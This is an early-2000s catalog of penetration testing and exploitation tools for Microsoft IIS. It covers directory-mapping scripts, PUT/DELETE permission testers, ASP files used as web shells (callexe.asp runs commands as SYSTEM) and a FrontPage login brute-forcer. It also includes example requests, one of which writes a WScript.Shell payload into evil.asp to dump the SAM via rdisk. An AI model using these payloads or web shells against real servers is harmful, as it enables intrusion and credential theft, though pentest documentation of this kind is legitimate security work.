Penetration Testing and Exploitation Tools for Microsoft IIS

by JoMo-kun 02/15/02


Testing Web Structure Permissions
Compromising Systems Using ASP
Brute Forcing FrontPage


Testing Web Structure Permissions

Mapping Web Site

GetDirsBDIR.pl

This script may be useful if Whisker returns to following security risk:

+ 200 OK: GET /scripts/iisadmin/bdir.htr

Performing a GET to the bdir.htr file, which is present on default installs of IIS 4.0, will return a single level directory listing of the C:\ drive. The GetDirsBDIR.pl script exploits this tool to create a recursive map of the directory structure under any drive and folder that the user specifies.

Example Usage: ./GetDirsBDIR.pl 192.168.0.1 d: inetpub\\wwwroot output.txt
Example Output:
Starting Directory Traversal...

inetpub
inetpub\iissamples
inetpub\iissamples\exair
inetpub\iissamples\exair\howitworks
inetpub\iissamples\sdk
inetpub\iissamples\sdk\asp
inetpub\iissamples\sdk\asp\docs


Finished Directory Traversal

GetDirsCMD.pl

This version of the script makes use of a copy of CMD.EXE to map the directory structure. For example, it's possible that a copy of CMD.EXE could be left at /msadc/root.exe by CodeRed or a copy at /scripts/uni.exe could be created by the unicoder perl script.

Example Usage: ./GetDirsCMD.pl 192.168.0.1 /scripts/root.exe c: inetpub\\wwwroot output.txt

GetDirsASP.pl

This is yet another version of the original GetDirsBDIR.pl script. This script makes use of the ASP code discussed below which displays directory listings. In order to make use of this script, the tester needs to be able to upload that ASP file.

Example Usage: ./GetDirsBDIR.pl 192.168.0.1 d: inetpub\\wwwroot output.txt

Checking Web Directory Permissions

** It should be noted that the output from the directory mapping scripts above may need to be modified slighty before being used with these scripts. For example, blank lines may need to be removed and '\' be replaced with '/'. **

GetOptions.pl

The GetOptions.pl script reads in a listing of directories relative to the web root and performs an HTTP OPTIONS for each.

PutDirs.pl

The PutDirs.pl reads in a listing of directories relative to the web root and attempts to do a HTTP PUT to each. The file it attempts to create is called "foo.txt" and contains the text "TEST". The script logs to the output file the status of each attempt.

PutDirs-DELETE.pl

The PutDirs-DELETE.pl is a clean-up script for the previous PutDirs.pl script. It reads a list of directories and attempts to HTTP DELETE the "foo.txt" file in each.

ChkDirEXE.pl

The ChkDirEXE.pl takes as arguments the name of an executable script/program, a file which contains directories relative to the web root and an output file name. It first attempts to HTTP PUT the executable to a web directory. If this is successful, it then calls the executable and determines if the web server attempted to actually run the code. Finally, the script does a HTTP DELETE on the file. The script will work through all directories listed in the input file and log all attempts to the output file.

Compromising Systems Using ASP

Once you've found a directory which allows PUT, try these...

getpath.asp

The getpath.asp ASP file will disclose the actual path of whatever relative path is coded into it.

copier.asp

The copier.asp ASP file will copy any file on the system (which the IUSR account has access) to any location on the system. The script uses actual paths, not relative.

dir_list.asp

The dir_list.asp will list out the directories in its own folder when called. The user can also specify which directory should be listed.

Example:
Request --> GET /dir_list.asp?DIR=C:\inetpub
Response -->

Contents of C:\Inetpub

File Name: File Size (bytes): Date Created: File Type:
Mailroot 0 11/14/00 11:30:32 AM File Folder
wwwroot 2698135 11/14/00 11:31:06 AM File Folder
iissamples 436551 11/14/00 11:31:27 AM File Folder
Mail 658140 11/14/00 11:36:41 AM File Folder
scripts 556293 11/14/00 11:39:06 AM File Folder
ftproot 0 11/14/00 11:39:26 AM File Folder
Catalog.wci 11055765 11/14/00 11:39:42 AM File Folder

callexe.asp

The callexe.asp ASP file is a powerful tool for rooting an IIS web server. This file allows the user to specify an executable or system command in the GET request.

Example: GET /callexe.asp?CMD=dir c:\
Example: GET /callexe.asp?CMD=evil.bat

This tool exposes a serious security risk in IIS in that the WScript.Shell object executes as SYSTEM. See the following article: http://support.microsoft.com/default.aspx?scid=kb;EN-US;q278319. With this ASP file, running "rdisk /s-" and copying over a sam._ is trivial. Enjoy...

FYI: If there is already a copy of CMD.EXE on the website, it is possible to use it to create a simple ASP file which exploits this. See the below example for how to accomplish this with "echo". You won't see anything other than "" displayed, but IIS should be working it's magic behind the scenes.

Example:

GET /root.exe?/c echo "<% Set WShShell = Server.CreateObject("WScript.Shell") RetCode = WShShell.Run("C:\winnt\system32\rdisk.exe /s-", 1, True) %>" > evil.asp
GET /evil.asp

Brute Forcing FrontPage

**UPDATE** New better
tool released.


fp-checker.tar.gz

The fp-checker.pl script is a tool for brute forcing logins to an IIS server running FrontPage. It reads in either a list of username/password combinations or a list of passwords to try for a single username. It makes use of the included NTLM proxy to make repeated connection attempts to the FrontPage author.dll file and report if the attempt was successful. FYI: This script has not been heavily tested. It appears to work.